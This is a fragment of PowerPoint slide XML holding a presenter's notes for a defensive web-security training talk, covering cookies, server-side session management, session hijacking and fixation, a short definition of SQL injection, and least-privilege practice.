        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2140" name="Shape 2140"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cookies are essentially just a piece of data that a server asks the client to remember. The client is then supposed to send that piece of data back to the server if it ever makes a request to it again. There are a few caveats involved, where there are some additional checks that take place, but that's essentially the gist of it.</a:t>
            </a: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3" name="Shape 2173"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2174" name="Shape 2174"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So let's look at our original example, but in a world where cookies exist.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The initial request from the user is the same, they tell the website who they are and that the want to login. The server checks that their password is correct, but before they respond to the user, it will create a "session". It will create a record of who the user is and that they're logged in, and will assign a unique identifier to this "session". The server will now reply to the user as before, but will include the cookie in its response, telling the user's browser to remember that session identifier and to use it on all subsequent requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The client will then remember that information and store it in the browser.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lvl1pPr>
              <a:defRPr i="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This slide showed details of our response to the security issue, including how long it took us to resolve it from the initial report (3h 47m), and some of our correspondence with the researcher (which is the reason for redacting this slide).</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0" name="Shape 2210"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2211" name="Shape 2211"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Now when it comes to the second request, where the user wants to see their profile, the browser will now contact the server, but this time it will include that unique identifier it was told to include. When the server receives the request, it will see this ID, and look it up in its little database of sessions. If it finds a match, it can now see all the state about that user it needs to. It knows the user logged in previously, and then knows whose profile it should return. It can now send the response back to the user with the data they asked for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The user is happy, since now they can finally see their profile.</a:t>
            </a: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9" name="Shape 2219"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2220" name="Shape 2220"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Some things to note about the user identification. We want to be sure to only store the unique session identifier in the cookie. The session data itself should be kept on the server side. Client-side session cookies (this is cookies where you store the entire session state in them) should be avoided, since it can be very tricky to remotely revoke them. The control is entirely on the user's side. You don't want your users to be able to manipulate their session data, since they could start telling you they're someone else for example. Usually you would add some sort of integrity check to the client-side session cookie so you know it's not been tampered with, but that still doesn't get around the problem of revoking it.</a:t>
            </a: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8" name="Shape 2228"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2229" name="Shape 2229"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The main takeaway here is to never give the user the option to manipulate sessions, always store session data on the server-side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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7" name="Shape 2237"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2238" name="Shape 2238"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So what are some of the problems you can have with session management? The main problem is something called "Session Hijacking".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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6" name="Shape 2246"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2247" name="Shape 2247"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This is where an attacker can take over the session of another user. This can happen in several different ways. Either they were able to steal your session identifier, so they can tell the server that they're you. Another way is by just guessing session identifiers (this is why they should be random!), another way is by manipulating cookies that weren't stored properly. If a cookie was made accessible more widely that it should have been, an attacker might be able to manipulate it to steal your session, or have you change from your own session to their session...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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5" name="Shape 2255"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2256" name="Shape 2256"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Which brings me to another attack, session fixation. This is where an attacker is able to start a session themselves, then have you use that session without you realizing. Then once you login, they get logged in as you too. This used to be really easy when session IDs where passed as GET parameters, which is why you no longer see that (at least you shouldn't!)</a:t>
            </a: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4" name="Shape 2264"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2265" name="Shape 2265"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>One of the key things here is that cookies are user-supplied data. You should never blindly trust them, treat them like you would any other user input. You should always verify the authenticity and integrity of a cookie before you start using it, especially when using for session management. So how do we secure sessions?</a:t>
            </a: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8" name="Shape 2278"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2279" name="Shape 2279"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The first step is to verify the session data. This is as simple as adding a few extra pieces of information to the session data you store on your side, and then verifying things against that when a user says it's their session. You want to add an expiration date, so you can expire the session if it's too old. You also want to confirm that you actually created the session, and it's not just a random ID an attacker is trying.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You can also do something called a loose IP check, where you verify the first few octets of their IP address match what the user was using (this would spot things where a user suddenly connects from a different country, etc). There are some problems with that though, where it can give you some false positives, so use with caution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>All of these checks allow you to kill potentially suspicious sessions ahead of time. It catches the low hanging fruit, but isn't a 100% way of stopping attacks.</a:t>
            </a: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0" name="Shape 2290"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2291" name="Shape 2291"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We also want to protect our session IDs so that we limit the potential for them to be stolen by an attacker. As already mentioned, we want to be sure they're both unique and random. If an attacker can guess or reuse a session identifier, that can lead to the session being taken over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>When passing a cookie to the client, we want to be sure we set the secure and httpOnly flags on those cookies. This ensures that the session ID is only ever sent over a secure connection, and cannot be accessed via a client-side script (reducing the risk of it being stolen if someone exploits an XSS vulnerability for example). We also want to be sure we specify a domain, so that the cookie won't be shared with anyone else but us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The final thing is to always make sure you generate a completely new session ID and send that to the user if their privileges ever get elevated (i.e they login). This helps to prevent session fixation, since the user would be in a new session once they've logged in.</a:t>
            </a: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0" name="Shape 2300"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2301" name="Shape 2301"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We also need to protect the actual session data we're storing. As I mentioned earlier, we want to be sure we're storing it all server-side. We want to make sure that we have an expiration date in our session data itself, we shouldn't be relying on a user's cookie to expire to end the session, we need to make sure we proactively expire it on our side. Remember that a cookie is user supplied data, they can change the expiration date if they want.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Finally, when a user logs out, we want to completely destroy their session on the server side, so there's no chance of it accidentally keeping a user (or attacker) logged in.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p>
            <a:pPr/>
            <a:r>
              <a:t>OK, let's get started with some actual technical content. Our first main topic is SQL injection.</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9" name="Shape 2309"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2310" name="Shape 2310"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>As with most of the vulnerabilities today, the common theme is to never trust user input. Cookies, input fields, anything the user controls should never be trusted. Don't forget that this can include data a user has already stored in our database!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There are lots of examples where users can do things you don't expect.</a:t>
            </a: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8" name="Shape 2318"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2319" name="Shape 2319"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>This example is titled "Using JavaScript as your only form of input validation".</a:t>
            </a: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6" name="Shape 2326"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2327" name="Shape 2327"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Here's a "secure" bike storage solution. Users will always find ways to bypass checks you have in place.</a:t>
            </a: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4" name="Shape 2334"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2335" name="Shape 2335"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You just can't trust users. They'll try anything.</a:t>
            </a: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4" name="Shape 2344"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2345" name="Shape 2345"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>As is has become tradition in each section, here are some links you can read if you want to know more about session management.</a:t>
            </a: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3" name="Shape 2353"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2354" name="Shape 2354"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, I know we've been here a while, I only have two more sections left though. This is one is a quick refresher on permissions.</a:t>
            </a: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4" name="Shape 2364"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Shape 2365"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What’s wrong with this picture? You're sending some random script over an insecure channel and executing it with root permissions on your shell. Hopefully you can all see why this isn't an ideal situation.</a:t>
            </a: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5" name="Shape 2375"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2376" name="Shape 2376"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Remember, with great power comes great responsibility. Don't use sudo for things where you don't have to. Better yet, don't have the power at all if you don't need it. Use it wisely if you do.</a:t>
            </a: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4" name="Shape 2384"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2385" name="Shape 2385"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You want to always be mindful of how much power you have, and the environment you're wielding it in. If you just need to read some data, try using read-only permissions instead of something that gives you complete administrative access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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3" name="Shape 2393"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394" name="Shape 2394"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>And revoke privileges if you don't need them. Don't just acquire an endless list of permissions you don't use. If you don't need sudo on a system, revoke it. If you don't need access to AWS Production, revoke it. The most secure accounts are the ones which don't exist in the first place.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Shape 370"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Shape 371"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What actually is it? This is the simplest one-liner I could come up with. It's any user input which is being executed in an SQL query at runtime. That means the user is able to manipulate a database query based on their input.</a:t>
            </a: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2" name="Shape 2402"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2403" name="Shape 2403"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you're running some reports on a DB, try a read-only user instead. If you're deleting things from S3, don't use a role that has permissions to delete an EC2 instance, use a role that is limited just to the bucket you need, etc.</a:t>
            </a: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1" name="Shape 2411"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2412" name="Shape 2412"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The key takeaway here is to always use the least permissive access you can to accomplish what you need. This reduces the changes of accidentally doing something you didn't want, and also means if an attacker gets the credentials that they are also limited in what they can do.</a:t>
            </a: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1" name="Shape 2421"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2422" name="Shape 2422"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, so I know I've been speaking to you all for a while now, but I wanted to end with something that might not be super relevant in your day to day roles, but which I thought was interesting nonetheless. I wanted to cover some classic vulnerabilities that aren't necessarily web app related, just a bit of fun and history.</a:t>
            </a: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8" name="Shape 2438"/>
